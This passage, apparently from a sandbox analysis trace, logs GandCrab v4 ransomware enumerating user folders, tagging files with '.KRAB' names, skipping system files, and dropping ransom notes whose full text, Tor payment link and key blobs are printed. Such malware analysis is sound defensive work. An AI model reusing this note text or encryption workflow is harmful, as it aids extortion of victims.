REB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.465] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.466] CloseHandle (hObject=0x320) returned 1 [0100.466] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.466] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.466] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x29d)) [0100.466] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.467] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.467] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.467] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Links\\d2ca4a08d2ca4dee3d.lock") returned 46 [0100.467] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\links\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.468] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.469] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.469] lstrlenW (lpString="C:\\Users\\Default\\Links\\") returned 23 [0100.469] lstrcatW (in: lpString1="C:\\Users\\Default\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Links\\*") returned="C:\\Users\\Default\\Links\\*" [0100.469] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbdfe0 [0100.469] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.469] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.469] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.469] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.469] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.469] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.469] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.469] lstrcatW (in: lpString1="C:\\Users\\Default\\Links\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\Links\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\Links\\d2ca4a08d2ca4dee3d.lock" [0100.469] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.469] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Links\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 51 [0100.470] lstrlenW (lpString="C:\\Users\\Default\\Links\\d2ca4a08d2ca4dee3d.lock") returned 46 [0100.470] lstrlenW (lpString=".lock") returned 5 [0100.470] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.470] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.470] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.470] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.470] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.470] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.470] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.470] lstrcatW (in: lpString1="C:\\Users\\Default\\Links\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Links\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\Links\\KRAB-DECRYPT.txt" [0100.470] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.470] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Links\\KRAB-DECRYPT.txt.KRAB") returned 44 [0100.471] lstrlenW (lpString="C:\\Users\\Default\\Links\\KRAB-DECRYPT.txt") returned 39 [0100.471] lstrlenW (lpString=".txt") returned 4 [0100.471] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.471] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.471] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.471] lstrlenW (lpString="C:\\Users\\Default\\Links\\KRAB-DECRYPT.txt") returned 39 [0100.471] lstrlenW (lpString="C:\\Users\\Default\\Links\\KRAB-DECRYPT.txt") returned 39 [0100.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.471] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.471] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.471] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0100.471] FindClose (in: hFindFile=0xfbdfe0 | out: hFindFile=0xfbdfe0) returned 1 [0100.471] CloseHandle (hObject=0x320) returned 1 [0100.472] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.472] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0100.472] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0100.472] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Local Settings" | out: lpString1="C:\\Users\\Default\\Local Settings") returned="C:\\Users\\Default\\Local Settings" [0100.472] lstrcatW (in: lpString1="C:\\Users\\Default\\Local Settings", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Local Settings\\") returned="C:\\Users\\Default\\Local Settings\\" [0100.472] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.472] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.472] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.472] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0100.472] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0100.472] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Music" | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0100.472] lstrcatW (in: lpString1="C:\\Users\\Default\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\" [0100.472] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.472] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.472] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.472] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.472] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.472] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.473] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.473] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Music\\\\KRAB-DECRYPT.txt") returned 40 [0100.473] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\music\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0100.473] GetLastError () returned 0x50 [0100.473] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.473] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.473] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x29d)) [0100.474] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.474] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.474] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.474] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Music\\d2ca4a08d2ca4dee3d.lock") returned 46 [0100.474] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\music\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.474] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.475] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.475] lstrlenW (lpString="C:\\Users\\Default\\Music\\") returned 23 [0100.475] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Music\\*") returned="C:\\Users\\Default\\Music\\*" [0100.475] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbdfe0 [0100.475] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.475] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.475] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.475] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.475] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.475] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.475] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.475] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\Music\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\Music\\d2ca4a08d2ca4dee3d.lock" [0100.475] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.475] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Music\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 51 [0100.475] lstrlenW (lpString="C:\\Users\\Default\\Music\\d2ca4a08d2ca4dee3d.lock") returned 46 [0100.475] lstrlenW (lpString=".lock") returned 5 [0100.475] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.476] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.476] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.476] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.476] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.476] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.476] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.476] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Music\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\Music\\KRAB-DECRYPT.txt" [0100.476] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.477] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Music\\KRAB-DECRYPT.txt.KRAB") returned 44 [0100.477] lstrlenW (lpString="C:\\Users\\Default\\Music\\KRAB-DECRYPT.txt") returned 39 [0100.477] lstrlenW (lpString=".txt") returned 4 [0100.477] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.477] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.477] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.477] lstrlenW (lpString="C:\\Users\\Default\\Music\\KRAB-DECRYPT.txt") returned 39 [0100.477] lstrlenW (lpString="C:\\Users\\Default\\Music\\KRAB-DECRYPT.txt") returned 39 [0100.477] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.477] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.477] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.477] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.477] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.477] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.477] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.477] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.477] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.478] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.478] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.478] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0100.478] FindClose (in: hFindFile=0xfbdfe0 | out: hFindFile=0xfbdfe0) returned 1 [0100.478] CloseHandle (hObject=0x320) returned 1 [0100.478] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.478] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0100.478] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0100.478] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="My Documents" | out: lpString1="C:\\Users\\Default\\My Documents") returned="C:\\Users\\Default\\My Documents" [0100.478] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\My Documents\\") returned="C:\\Users\\Default\\My Documents\\" [0100.478] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.479] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.479] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.479] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.479] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.479] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.479] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.479] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\My Documents\\\\KRAB-DECRYPT.txt") returned 47 [0100.479] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\my documents\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0100.480] GetLastError () returned 0x50 [0100.480] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.480] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.480] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x2ad)) [0100.480] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.481] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.481] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.481] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\My Documents\\d2ca4a08d2ca4dee3d.lock") returned 53 [0100.481] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\my documents\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.481] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.482] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.482] lstrlenW (lpString="C:\\Users\\Default\\My Documents\\") returned 30 [0100.482] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\My Documents\\*") returned="C:\\Users\\Default\\My Documents\\*" [0100.482] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0100.482] CloseHandle (hObject=0x320) returned 1 [0100.482] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.482] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0100.482] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0100.482] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NetHood" | out: lpString1="C:\\Users\\Default\\NetHood") returned="C:\\Users\\Default\\NetHood" [0100.482] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood", lpString2="\\" | out: lpString1="C:\\Users\\Default\\NetHood\\") returned="C:\\Users\\Default\\NetHood\\" [0100.482] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.482] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.482] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.483] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.483] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.483] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.483] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.483] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\NetHood\\\\KRAB-DECRYPT.txt") returned 42 [0100.483] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\nethood\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.485] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql